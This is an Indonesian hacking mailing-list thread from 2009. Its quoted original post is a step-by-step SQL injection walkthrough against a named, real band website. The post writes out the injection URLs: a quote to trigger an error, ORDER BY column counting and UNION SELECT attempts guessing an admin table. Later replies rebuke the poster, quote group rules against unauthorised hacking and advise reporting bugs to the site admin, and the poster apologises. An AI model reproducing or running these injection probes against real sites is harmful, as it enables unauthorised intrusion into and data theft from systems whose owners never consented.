iya, sekali lagi aku minta maaf, dan aku udah lapor ke adminnya. --- Pada Ming, 7/6/09, Muh. Fitrah <fitrah_fu...@yahoo.com> menulis:
Dari: Muh. Fitrah <fitrah_fu...@yahoo.com> Topik: Bls: [YF] [SHARE] SQLI @ www.sheilaon7.com Kepada: yogyafree-perjuangan@yahoogroups.com Tanggal: Minggu, 7 Juni, 2009, 12:06 PM aq setuju bang, kita disini bukan buat pamer... apa lagi di xcode bukan tujuannya untuk merusak suatu sistem atau website. kyknya file peraturan belum dibaca Peraturan Umum Yogyafree 2008-2009 : -Tindakan Hacking tanpa ijin pemilik situs tidak diperbolehkan -Tindakan Hacking hanya diperbolehkan jika sudah ijin pemilik situs untuk penetration test agar aplikasi web lebih aman dan lebih baik -Tindakan Carding tidak diperbolehkan sama sekali termasuk bagi-bagi CC -Tindakan Penyebaran virus / mallware tidak diperbolehkan jika untuk kepentingan negatif tetapi diperbolehkan untuk mengetahui cara kerjanya sehingga diharapkan bisa memproteksi komputer kita dari serangan virus. -Tindakan merusak sistem / masuk tanpa ijin ke sistem orang lain tidak diperbolehkan jika tanpa ijin pemiliknya Jika ada segala tindakan hack, carding, penyebaran virus, perusakan dan semua yang negatif adalah di luar Yogyafree, semua administrator, moderator dan founder tidak bertanggung jawab sama sekali terhadap isi segala media di Yogyafree (Web, CD, Forum, Milis, dst) karena kami menyediakan isi tersebut semata-mata bertujuan untuk membantu para developer, programmer dst untuk mengetahui cara kerja melakukan penetrasi ke sistem target dengan ijin pemiliknya sehingga diharapkan nantinya dapat membuat sistem keamanan system komputer yang lebih baik. --- Pada Ming, 7/6/09, Andy Rz <andy...@yahoo. co.id> menulis: Dari: Andy Rz <andy...@yahoo. co.id> Topik: Bls: [YF] [SHARE] SQLI @ www.sheilaon7. com Kepada: yogyafree-perjuanga n...@yahoogroups. com Tanggal: Minggu, 7 Juni, 2009, 2:45 AM Sorry om, tindakan loe ceroboh. Kalo ada fans Sheilla disini terus dilaporin kepolisi, bisa ditangkap loe. Kalo loe nemuin bugs baiknya, loe laporin ke adminnya. Kayanya itu lebih bermanfaat. Jangan di expose. Maaf.. kalo kata2 gwe kurang berkenan.. Dari: Arya Dwisatya <a.dwisa...@yahoo. com> Kepada: yogyafree-perjuanga n...@yahoogroups. com Terkirim: Minggu, 7 Juni, 2009 11:45:16 Judul: [YF] [SHARE] SQLI @ www.sheilaon7. com Dilihat dari judulnya udah tau kan siapa targetnya? Kalo gitu kita mulai sekarang, target: http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=302 Kita cek bugnya, kita tambahkan ' pada akhir url http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=302' beberapa saat kemudian.... . (Syntax error or access violation) wah, tanda tanda bisa di inject nih, lanjut, ok, berhubung errornya "Syntax error or access violation" jadi, kita bisa inject web tersebut dengan cara yang hampir sama dengan cara iject php, khususnya php versi 4. Sekarang kita cari julah kolomnya. http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 1 <--tidak ada error http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 2 <--tidak ada error http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 3 <--tidak ada error http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 4 <--tidak ada error http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 5 <--tidak ada error http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 6 <--tidak ada error http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 7 <--tidak ada error http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 8 <--tidak ada error http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 26 <--tidak ada error http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=9 order by 27 <-- ada error nah, sekarang kita tahu kan? kalo web tersebut mempunyai 26 kolom, sekarang kita cari nomor yang bermasalah, kita gunakan perintah union seperti biasa, namun pada saat yang sama, kita juga harus menebak nama tablenya agar nomor yang bermasalah muncul. http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=302%20union% 20all%20select% 201,2,3,4, 5,6,7,8,9, 10,11,12, 13,14,15, 16,17,18, 19,20,21, 22,23,24, 25,26 jreng..... yang muncul malah error, bukan nomor yang bermasalah Query input must contain at least one table or query. sekarang kita coba tebak nama kolomnya, http://www.sheilaon 7.com/index. cfm?fuseaction= home.general§ion=about_ sheila_on_ 7_band&id=302%20union% 20all%20select% 201,2,3,4, 5,6,7,8,9, 10,11,12, 13,14,15, 16,17,18, 19,20,21, 22,23,24, 25,26%20from% 20admin <---keluar error untuk kelanjutannya, silahkan kunjungi xyber-breaker. blogspot. com maaf ya, sekalian promosi, hehehe. Berselancar lebih cepat. Internet Explorer 8 yang dioptimalkan untuk Yahoo! otomatis membuka 2 halaman favorit Anda setiap kali Anda membuka browser.Dapatkan IE8 di sini! (Gratis) Lebih bersih, Lebih baik, Lebih cepat - Yahoo! Mail: Kini tanpa iklan. Rasakan bedanya! Yahoo! Mail Sekarang Lebih Cepat dan Lebih Bersih. Rasakan bedanya! Cepat, Bebas Iklan, Kapasitas Tanpa Batas - Dengan Yahoo! Mail Anda bisa mendapatkan semuanya. http://id.mail.yahoo.com